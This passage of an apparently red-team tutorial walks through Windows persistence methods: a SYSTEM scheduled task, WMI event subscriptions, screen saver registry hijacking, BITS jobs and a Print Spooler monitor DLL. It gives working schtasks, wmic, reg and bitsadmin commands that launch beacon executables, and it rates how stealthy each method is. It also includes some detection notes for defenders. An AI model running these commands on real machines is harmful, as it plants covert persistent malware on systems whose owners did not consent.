&lt;p&gt;&lt;code&gt;SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN \Microsoft\Windows\evil\eviltask /TR C:\Users\hunter\Desktop\evil.exe&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;A beacon is received without requiring user logon:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81grdukopp6u725bakfp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F81grdukopp6u725bakfp.png" alt=" " width="800" height="402"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the process tree, the malicious process is spawned by &lt;code&gt;taskeng.exe&lt;/code&gt;, the Task Scheduler engine (this is the Windows 7/8 and early Windows 10 behaviour; on recent Windows 10 and Windows 11 builds &lt;code&gt;taskeng.exe&lt;/code&gt; no longer exists and the task's parent is the &lt;code&gt;svchost.exe&lt;/code&gt; instance hosting the Schedule service). Its stealth is inferior to DLL services but superior to auto‑start registry keys. Note, however, that the task is still a persistent on-disk artifact: its definition is written as XML under &lt;code&gt;C:\Windows\System32\Tasks\&lt;/code&gt; and mirrored in the &lt;code&gt;TaskCache&lt;/code&gt; registry tree, task creation is recorded in the Task Scheduler operational log (and in the Security log where object auditing is enabled), and a SYSTEM task whose action points into a user profile directory such as &lt;code&gt;C:\Users\&amp;lt;user&amp;gt;\Desktop&lt;/code&gt; is an obvious anomaly for defenders — and, because that directory is writable by the user, a privilege-escalation path for anyone who can replace the binary before the next boot.&lt;br&gt;&lt;br&gt;
However, another significant issue emerges: the individual &lt;code&gt;SCHTASKS&lt;/code&gt; switches cover only part of the task model. Many configuration options cannot be set through them, such as adding multiple triggers simultaneously or modifying settings in the "Conditions" and "Settings" tabs, as shown below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58afr39kavd2bw64l3jx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F58afr39kavd2bw64l3jx.png" alt=" " width="799" height="490"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figyig95qddxmbwd86b1u.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Figyig95qddxmbwd86b1u.png" alt=" " width="800" height="670"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These options remain at their creation defaults, meaning our scheduled task will not start when the machine is on battery power and will be stopped if AC power is disconnected, will not start upon wake from sleep, and will be killed if it runs for longer than three days (the default &lt;code&gt;ExecutionTimeLimit&lt;/code&gt; of &lt;code&gt;PT72H&lt;/code&gt; — a long-lived beacon process must either be exempted from this limit or be able to respawn). These advanced settings cannot be set through individual &lt;code&gt;SCHTASKS&lt;/code&gt; switches; the one command-line route is the &lt;code&gt;/XML&lt;/code&gt; switch listed in the help text above, which accepts a complete task definition — multiple triggers, Conditions and Settings included. A practical workflow is to export a similar built-in task with &lt;code&gt;schtasks /Query /TN &amp;lt;name&amp;gt; /XML&lt;/code&gt;, edit the result, and re-register it with &lt;code&gt;schtasks /Create /XML&lt;/code&gt;; on Windows 8/Server 2012 and later, PowerShell's &lt;code&gt;Register-ScheduledTask&lt;/code&gt; together with &lt;code&gt;New-ScheduledTaskSettingsSet&lt;/code&gt; exposes the same settings. A search of the Microsoft community yielded the following official response:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fge3acras554txd6iqqqi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fge3acras554txd6iqqqi.png" alt=" " width="798" height="175"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;It is both amusing and frustrating. For normal users, this is unproblematic, but for red teams, manipulating the GUI is inconvenient. While one could craft a DLL module or executable that directly calls the Task Scheduler (COM) API to modify these settings, that requires uploading an additional binary, reducing efficiency. A lighter alternative is the &lt;code&gt;/XML&lt;/code&gt; switch from the help text above: the full task definition, Conditions and Settings included, is a small text file that can be written in place with &lt;code&gt;echo&lt;/code&gt; or PowerShell rather than uploaded, then registered with &lt;code&gt;schtasks /Create /XML&lt;/code&gt;. Without that step, scheduled task persistence created with the plain switches can serve only as a fallback measure, not a fully reliable method.&lt;br&gt;&lt;br&gt;
A somewhat similar vector is Group Policy. Startup scripts can execute cmd or PowerShell scripts to run arbitrary commands, but because the command‑line tooling for editing local Group Policy is far too limited, it will not be expanded upon here. (If desktop access is available, configuring a startup script directly via &lt;code&gt;gpedit.msc&lt;/code&gt; achieves persistence with relatively high stealth — bearing in mind that a local startup script is itself an on-disk artifact, recorded under &lt;code&gt;C:\Windows\System32\GroupPolicy\Machine\Scripts\&lt;/code&gt;, and that machine startup scripts run as SYSTEM at boot, so the same "SYSTEM executing from a user-writable path" caveat applies to wherever the script and its payload are stored.)&lt;/p&gt;
&lt;h2&gt;
  
  
  0x05 WMI
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator privileges without UAC reduction.&lt;br&gt;&lt;br&gt;
WMI can be regarded as a set of APIs that interact directly with the Windows operating system. Being a native facility that requires no installation, it is also a valuable aid for persistence. Note that the &lt;code&gt;wmic.exe&lt;/code&gt; client used below is deprecated and is no longer present by default on recent Windows 11 builds; the WMI infrastructure itself remains, so on such hosts the same three objects can be created with PowerShell's &lt;code&gt;Set-WmiInstance&lt;/code&gt; or &lt;code&gt;New-CimInstance&lt;/code&gt;. Permanent WMI event subscriptions are also a well-documented persistence technique, so expect defenders to enumerate the &lt;code&gt;root\subscription&lt;/code&gt; namespace directly and to receive subscription-creation events from the WMI-Activity operational log and Sysmon; the &lt;code&gt;Name&lt;/code&gt; values and the consumer's executable path are what will be inspected.&lt;br&gt;&lt;br&gt;
Because an &lt;code&gt;__InstanceModificationEvent&lt;/code&gt; filter is polled repeatedly (every 60 seconds with &lt;code&gt;WITHIN 60&lt;/code&gt;) and fires on every poll whose result matches the query, an unbounded filter would spawn a new shell on each poll. To avoid spawning countless shells, restrict execution to a window of system uptime — in the example below, 240 to 310 seconds after boot, so that only one or two polls can land inside it. The window must be wider than the polling interval (otherwise a poll may miss it entirely) and should start late enough for the beacon's network dependencies to be up; some machines boot slowly, so the start of the window should be set higher. Example commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;wmic&lt;/span&gt; &lt;span class="na"&gt;/NAMESPACE&lt;/span&gt;:&lt;span class="s2"&gt;"\\root\subscription"&lt;/span&gt; &lt;span class="kd"&gt;PATH&lt;/span&gt; __EventFilter &lt;span class="kd"&gt;CREATE&lt;/span&gt; &lt;span class="kd"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"evil"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;EventNameSpace&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"root\cimv2"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="kd"&gt;QueryLanguage&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"WQL"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;Query&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime &amp;gt;= 240 AND TargetInstance.SystemUpTime &amp;lt; 310"&lt;/span&gt;

&lt;span class="nb"&gt;wmic&lt;/span&gt; &lt;span class="na"&gt;/NAMESPACE&lt;/span&gt;:&lt;span class="s2"&gt;"\\root\subscription"&lt;/span&gt; &lt;span class="kd"&gt;PATH&lt;/span&gt; &lt;span class="kd"&gt;CommandLineEventConsumer&lt;/span&gt; &lt;span class="kd"&gt;CREATE&lt;/span&gt; &lt;span class="kd"&gt;Name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"evilConsumer"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;ExecutablePath&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt;&lt;span class="kd"&gt;CommandLineTemplate&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt;

&lt;span class="nb"&gt;wmic&lt;/span&gt; &lt;span class="na"&gt;/NAMESPACE&lt;/span&gt;:&lt;span class="s2"&gt;"\\root\subscription"&lt;/span&gt; &lt;span class="kd"&gt;PATH&lt;/span&gt; __FilterToConsumerBinding &lt;span class="kd"&gt;CREATE&lt;/span&gt; &lt;span class="kd"&gt;Filter&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"__EventFilter.Name=\"&lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt;\&lt;span class="s2"&gt;""&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="kd"&gt;Consumer&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s2"&gt;"CommandLineEventConsumer.Name=\"&lt;/span&gt;&lt;span class="kd"&gt;evilConsumer&lt;/span&gt;\&lt;span class="s2"&gt;""&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Due to possible variations in the exact timing window, multiple beacons may appear in certain circumstances:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgq6a0v11c2b17m55u3x2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgq6a0v11c2b17m55u3x2.png" alt=" " width="800" height="82"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the process tree reveals moderate stealth:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcymgee1zn4x8btj12747.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fcymgee1zn4x8btj12747.png" alt=" " width="800" height="267"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  0x06 Screen Saver
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Standard user.&lt;br&gt;&lt;br&gt;
Although not all users employ a screen saver, the relevant configuration is conveniently stored in the registry, as shown in the four keys below:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26lbjqtf5ihuooi1s4yo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F26lbjqtf5ihuooi1s4yo.png" alt=" " width="729" height="249"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Full paths:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveActive
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaverIsSecure
HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut
HKEY_CURRENT_USER\Control Panel\Desktop\SCRNSAVE.EXE
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Write directly to the registry:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;SCRNSAVE&lt;/span&gt;&lt;span class="err"&gt;.EXE&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="kd"&gt;C&lt;/span&gt;:\Users\hunter\Desktop\beacon.exe &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ScreenSaveActive&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="m"&gt;1&lt;/span&gt; &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ScreenSaverIsSecure&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="m"&gt;0&lt;/span&gt; &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;span class="nb"&gt;reg&lt;/span&gt; &lt;span class="kd"&gt;add&lt;/span&gt; &lt;span class="s2"&gt;"hkcu\control panel\desktop"&lt;/span&gt; &lt;span class="na"&gt;/v &lt;/span&gt;&lt;span class="kd"&gt;ScreenSaveTimeOut&lt;/span&gt; &lt;span class="na"&gt;/d &lt;/span&gt;&lt;span class="m"&gt;60&lt;/span&gt; &lt;span class="na"&gt;/f
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Examining the process tree shows it is spawned by &lt;code&gt;winlogon.exe&lt;/code&gt; – stealth is moderate:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3mllhapjx2x7yrdpnpvk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F3mllhapjx2x7yrdpnpvk.png" alt=" " width="181" height="88"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;A minor pitfall: if a screen saver has never been configured, none of these values exist except &lt;code&gt;ScreenSaveActive&lt;/code&gt; (which defaults to 1). The screen saver only runs when all of them hold data, so all four must be written. Testing also shows that the shortest effective trigger time is 60 seconds – a smaller &lt;code&gt;ScreenSaveTimeOut&lt;/code&gt; still results in execution after 60 seconds. Be aware that the commands above also set &lt;code&gt;ScreenSaverIsSecure&lt;/code&gt; to 0, which disables the lock on resume; this is a user‑visible change to the session and weakens the host's own protection, so it is a detail both operators and defenders should notice.&lt;br&gt;&lt;br&gt;
Naturally, as indicated by the registry path, this method yields a shell with only current‑user privileges. Its advantage is that it does not require elevation.&lt;/p&gt;
&lt;h2&gt;
  
  
  0x07 Background Intelligent Transfer Service (BITS)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Administrator account, but no elevation: the commands work from a non‑elevated (medium‑integrity) administrator session, so no UAC prompt is triggered.&lt;br&gt;&lt;br&gt;
The Background Intelligent Transfer Service (BITS) facilitates the transfer of large amounts of data without degrading network performance. It accomplishes this by transferring data in small blocks, utilising available idle bandwidth, and reassembling the data at the destination. BITS is supported on Microsoft® Windows Server 2003 family operating systems and Microsoft® Windows 2000. (Source: Baidu Baike)&lt;br&gt;&lt;br&gt;
Many online "penetration testing tutorials" present &lt;code&gt;bitsadmin&lt;/code&gt; only as a file‑download or command‑execution primitive, but it also provides persistence: the job is kept by the BITS service rather than in a conventional auto‑start location, so Autoruns does not list it and anti‑virus rules that watch the usual auto‑start locations are not triggered by it.&lt;br&gt;&lt;br&gt;
Adding a task is straightforward, requiring only four commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="nb"&gt;bitsadmin&lt;/span&gt; &lt;span class="na"&gt;/create &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt;
&lt;span class="nb"&gt;bitsadmin&lt;/span&gt; &lt;span class="na"&gt;/addfile &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt;
&lt;span class="nb"&gt;bitsadmin.exe&lt;/span&gt; &lt;span class="na"&gt;/SetNotifyCmdLine &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt; &lt;span class="s2"&gt;"C:\Users\hunter\Desktop\beacon.exe"&lt;/span&gt; &lt;span class="kd"&gt;NUL&lt;/span&gt;
&lt;span class="nb"&gt;bitsadmin&lt;/span&gt; &lt;span class="na"&gt;/Resume &lt;/span&gt;&lt;span class="kd"&gt;evil&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;One advantage is that the job can be created from a non‑elevated (medium‑integrity) administrator session without a UAC prompt; correspondingly, the resulting beacon runs at that same reduced integrity level rather than as an elevated administrator:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnce9081cdaaq6vmiuu7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnce9081cdaaq6vmiuu7.png" alt=" " width="800" height="114"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After a reboot, since the task has not been completed, the system will re‑launch it, thus achieving persistence. Although BITS tasks have a default lifetime of 90 days—after which they are automatically cancelled—this is sufficient for red team operations:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsbg4z8sv3yrgky3dcqt3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsbg4z8sv3yrgky3dcqt3.png" alt=" " width="800" height="678"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Inspecting the process tree, it is launched by &lt;code&gt;svchost.exe -k netsvcs&lt;/code&gt;. However, because it remains an independent process, stealth is moderate:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15oryg198w9egqse1sx2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F15oryg198w9egqse1sx2.png" alt=" " width="800" height="823"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In the author's testing none of the startup‑inspection tools tried surfaced this method, because the job is stored by the BITS service itself rather than in a registry or file‑system auto‑start location. The reliable way to find it is to enumerate BITS jobs for all users, e.g. with the &lt;code&gt;bitsadmin&lt;/code&gt; command below (PowerShell's &lt;code&gt;Get-BitsTransfer -AllUsers&lt;/code&gt; lists the same jobs):&lt;/p&gt;

&lt;p&gt;&lt;code&gt;bitsadmin /list /allusers /verbose&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;All tasks are displayed as shown (screenshot from a different test machine, hence data differs):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56bixo0pqnt5a1riitvy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F56bixo0pqnt5a1riitvy.png" alt=" " width="645" height="591"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  0x07 Print Spooler Service
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Required Privileges:&lt;/strong&gt; Fully elevated (high‑integrity) administrator – writing into &lt;code&gt;System32&lt;/code&gt; and under the HKLM print‑monitor key is required, so a UAC‑restricted administrator token is not sufficient.&lt;br&gt;&lt;br&gt;
The Print Spooler service manages print jobs on Windows. Because many users still rely on printers, system‑optimisation tools do not recommend disabling it. The spooler API exposes &lt;code&gt;AddMonitor&lt;/code&gt;, which installs a local port monitor and registers its configuration, data and monitor files; the monitor DLL named in the registry is then loaded into the &lt;code&gt;spoolsv.exe&lt;/code&gt; process, which runs as SYSTEM. The monitor DLLs present on a default installation are as follows:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcy1uun0t16z81wco9zg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flcy1uun0t16z81wco9zg.png" alt=" " width="632" height="56"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtuk93bthr2f7yxmeyal.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fgtuk93bthr2f7yxmeyal.png" alt=" " width="666" height="62"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F676t9urxao7r6scu4jyf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F676t9urxao7r6scu4jyf.png" alt=" " width="654" height="58"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkho0j1cqsppj2426twu8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkho0j1cqsppj2426twu8.png" alt=" " width="676" height="52"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4qnr1b8cvqu5cwosvej.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fa4qnr1b8cvqu5cwosvej.png" alt=" " width="666" height="70"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;These DLLs contain print‑driver‑related content. We can exploit this mechanism to plant a malicious DLL. Of course, as with service registration, this requires full administrator privileges.&lt;br&gt;&lt;br&gt;
First, place the malicious DLL in &lt;code&gt;C:\Windows\System32\&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hcvqsbrjy2ryfif3d84.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5hcvqsbrjy2ryfif3d84.png" alt=" " width="800" height="377"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then create the monitor subkey together with its &lt;code&gt;Driver&lt;/code&gt; value in a single command. The value holds only a file name, which is why the DLL was placed in &lt;code&gt;System32&lt;/code&gt; above. For defenders, any subkey under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt; beyond the defaults shown earlier, or a &lt;code&gt;Driver&lt;/code&gt; value naming an unexpected DLL, is the artefact to baseline and alert on:&lt;/p&gt;

&lt;p&gt;&lt;code&gt;reg add "hklm\system\currentcontrolset\control\print\monitors\monitor" /v "Driver" /d "monitor.dll" /t REG_SZ&lt;/code&gt;&lt;/p&gt;

